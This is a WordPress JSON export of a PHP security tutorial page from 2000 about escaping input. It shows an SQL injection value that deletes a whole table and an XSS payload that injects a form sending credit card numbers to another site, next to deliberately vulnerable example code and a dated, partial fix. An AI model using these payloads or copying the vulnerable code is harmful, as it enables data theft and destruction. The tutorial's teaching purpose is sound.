{"id":1433,"date":"2018-01-19T19:22:50","date_gmt":"2018-01-19T19:22:50","guid":{"rendered":"http:\/\/goofy-trucks.flywheelsites.com\/check-data-page-3\/"},"modified":"2018-01-19T19:24:47","modified_gmt":"2018-01-19T19:24:47","slug":"check-data-page-3","status":"publish","type":"post","link":"https:\/\/phpbuilder.com\/check-data-page-3\/","title":{"rendered":"Check Data Page 3"},"content":{"rendered":"
\n
\n
By Spencer P<\/div>\n
on November 3, 2000<\/div>\n<\/p><\/div>\n
\n

Manipulating Your Input<\/h2>\n
\nThis is a more subtle problem for those who may not fully understand
\nevery detail of what they are doing. Good data manipulation is a matter
\nof watching what you do and<\/i> how you do it, because this is where
\nhackers and crackers can have a field day.<\/div>\n
\nIn our original function, there is a statement:<\/div>\n
\n<\/p>\n

<?php<\/p>\n

OCIPrepare<\/span>(<\/span>$dbh<\/span>,<\/span>\"
\n
\u00a0\u00a0\u00a0\u00a0Insert\u00a0into\u00a0addressBook
\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0(firstName,lastName,streetAddress,city,zip)
\n
\u00a0\u00a0\u00a0\u00a0values
\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0('$firstName','$lastName','$streetAddress','$city','$zip')\"<\/span>);<\/p>\n

<\/span>?>
\n
<\/span>
\n<\/span>
\n<\/code><\/font><\/div>\n

\nBob O’Connor is a candidate to have his address saved in our table
\naddress book. The string in which the SQL is parsed now contains “…
\n(‘Bob’,’O’Connor’, ….” You may see the error now. That single quote in
\n“O’Connor” needs to be escaped. The oracle way is to turn “O’Connor”
\ninto “O”Connor”, by replacing all single apostrophes with two
\napostrophes.<\/div>\n
\nBob O’Connor probably doesn’t care how you deal with this situation,
\nbut let’s think about the hacker and\/or cracker who will love you for a
\nstatement like:<\/div>\n
\n

delete from addressBook where lastName=$lastname\n<\/p><\/div>\n

\nWhat if $lastname=”” or 1″? Now our statement looks like:<\/div>\n
\ndelete from addressBook where lastName=” or 1\n<\/div>\n
\nEverything out of your address book has now successfully been deleted. It is now time to
\nbreak out the 40gig backup tapes.<\/div>\n
\nJust because one language (like PHP) can take your input without a
\nproblem, don’t assume that another language (like SQL) will happily accept the same
\ninput. This is not a matter of coding for what you want to
\nhappen: it is a matter of coding for what you don’t want to happen.
\nEscape your characters if you are using more than one language interpreter.
\nIf you are using PHP to evaluate dynamic PHP via eval(), don’t assume
\nthat the variables you use to construct the dynamic PHP will be
\nsane. <\/div>\n
\nOne more example. Here’s a simple piece of HTML and PHP which does
\nsomething neat.<\/div>\n
\n
\n<?php<\/p>\n

<\/span>if(<\/span>$CC<\/span>)\u00a0{
\n
\u00a0\u00a0\u00a0\u00a0<\/span>save<\/span>(<\/span>$CC<\/span>);
\n
\u00a0\u00a0\u00a0\u00a0<\/span>header<\/span>(<\/span>\"Location:\u00a0<https:\/\/www.mystore.com\/my.php>\"<\/span>);
\n
\u00a0\u00a0\u00a0\u00a0exit();
\n
}
\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0
\n
<\/span>?>
\n
<\/span>
\n<\/span>
\n<\/code><\/font><\/div>\n

\n
\n<form method=\"post\" action=\"my.php\">\nInput your CC number to pay for your purchase.<br>\n<input type=\"text\" name=\"CC\" value=\"<?php echo $CC; ?>\"><br>\n<input type=\"submit\" value=\"Show me the money!\">\n<\/form>\n<\/pre>\n<\/div>\n
\nA piece of code to save your credit card number, but with one faux pas:
\nI didn’t check to be sure $CC is valid before trying to save!  But
\nsave($CC) should check to make sure it’s getting valid input, as well.
\nLet’s assume the spec for save($CC) is: if the $CC is valid, it is saved;
\nelse, an error is returned.  So let’s change our code to correspond
\nwith that spec.<\/div>\n
\n<\/p>\n
<?php<\/p>\n
<\/span>if(<\/span>save<\/span>(<\/span>$CC<\/span>))\u00a0{
\n
\u00a0\u00a0\u00a0\u00a0<\/span>header<\/span>(<\/span>\"Location:\u00a0....\"<\/span>);
\n
\u00a0\u00a0\u00a0\u00a0exit;
\n
}
\n
\u00a0\u00a0\u00a0\u00a0
\n
<\/span>?>
\n
<\/span>
\n<\/span>
\n<\/code><\/font><\/div>\n
\nSo now if $CC is invalid, our little input tag does something cool.  It
\nlets the user see and correct his mistake! <\/div>\n
\n<input type=”text” name=”CC” value=”<?php echo $CC; ?>”><\/div>\n
\nRemember what I said about coding in one language to output to another?
\nThis example is vulnerable to cross-site scripting.   (This is when you
\ninput your own script code as input to another program and the result
\nreturned is a page that now does something else — something the
\nprogrammer never intended.)  A hacker\/cracker might input the following for
\n$CC…watch the exact characters used:<\/div>\n
\n
\n\"><\/form><form action=<http:\/\/www.mycompetitor.com\/haha.cgi>>\nInput your CC again for validation purposes: \n<input name=\"CC\"><input type=submit><\/form><!-\n<\/pre>\n<\/div>\n
\nDon’t worry how the person managed to fit all of this into our
\nprogram.  Now our web page will look like this after PHP gets to it:<\/div>\n
\n
\n<form method=\"post\" action=\"my.php\">\nInput your CC number to pay for your purchase.\n<input type=\"text\" name=\"CC\" value=\"\"><\/form><form \naction=<http:\/\/www.mycompetitor.com\/haha.cgi>>Input your CC again for validation \npurposes: <input name=\"CC\"><input type=submit><\/form><!-\">\n<input type=\"submit\" value=\"Show me the money!\">\n<\/form>\n<\/pre>\n<\/div>\n
\nThis is a very simple hack and slash example, but our page will now
\nhave two input fields.  The first goes nowhere since the submit button
\nisn’t within the <form><\/form> tags. The second sends the credit card
\nnumber to another site!  The rest of the HTML is blanked out after the
\nsecond closing form tag.  A quick and nasty hack, eh?  We can beautify this
\nfurther, but the point here is to show that you should never trust your input.  HTML
\nis taking input from PHP.<\/div>\n
\nHow to prevent this?  A line before or during printing:<\/div>\n
\n<\/p>\n
<?php<\/p>\n
$CC<\/span>=<\/span>ereg_replace<\/span>(<\/span>\"\"\"<\/span>,<\/span>\"&quot;\"<\/span>,<\/span>$CC<\/span>);<\/p>\n
<\/span>?>
\n
<\/span>
\n<\/span>
\n<\/code><\/font><\/div>\n
\nNow if some evil person tries the above malicious code, or even a
\nsimple:<\/div>\n
\n
“><input type=”submit” value=”DIE!\n<\/p><\/div>\n
\nThis will output:<\/div>\n
\n
\n<form method=\"post\" action=\"my.php\">\nInput your CC number to pay for your purchase.\n<input type=\"text\" name=\"CC\" value=\"\"><input \ntype=\"submit\" value=\"DIE!\">\n<input type=\"submit\" value=\"Show me the money!\">\n<\/form>\n<\/pre>\n<\/div>\n
\nAnnoying to anyone who views it?  Yes.  Dangerous to your customers?
\nDefinitely not.  The value in the input field is practically garbage.  In
\nfact, you might get a phone call about someone at haha@malicious.com
\n<\/ym\/Compose?To=haha@malicious.com&YY=7178&order=down&sort=date&pos=0>
\nsending you such things.  What you do to Mr. “haha” is entirely up to
\nyou.<\/div>\n<\/div>\n
<\/p>\n
\n
\u00ab Previous Page<\/a><\/div>\n
1<\/a> <\/div>\n
| <\/div>\n
2<\/a> <\/div>\n
| <\/div>\n
3<\/div>\n
| <\/div>\n
4<\/a> <\/div>\n
Next Page \u00bb<\/a><\/div>\n<\/div><\/div>\n","protected":false},"excerpt":{"rendered":"
By Spencer P on November 3, 2000 Manipulating Your Input This is a more subtle problem for those who may not fully understand every detail of what they are doing. Good data manipulation is a matter of watching what you do and how you do it, because this is where… <\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-1433","post","type-post","status-publish","format-standard","hentry","category-tutorials"],"_links":{"self":[{"href":"https:\/\/phpbuilder.com\/wp-json\/wp\/v2\/posts\/1433","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/phpbuilder.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/phpbuilder.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/phpbuilder.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/phpbuilder.com\/wp-json\/wp\/v2\/comments?post=1433"}],"version-history":[{"count":1,"href":"https:\/\/phpbuilder.com\/wp-json\/wp\/v2\/posts\/1433\/revisions"}],"predecessor-version":[{"id":3291,"href":"https:\/\/phpbuilder.com\/wp-json\/wp\/v2\/posts\/1433\/revisions\/3291"}],"wp:attachment":[{"href":"https:\/\/phpbuilder.com\/wp-json\/wp\/v2\/media?parent=1433"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/phpbuilder.com\/wp-json\/wp\/v2\/categories?post=1433"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/phpbuilder.com\/wp-json\/wp\/v2\/tags?post=1433"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}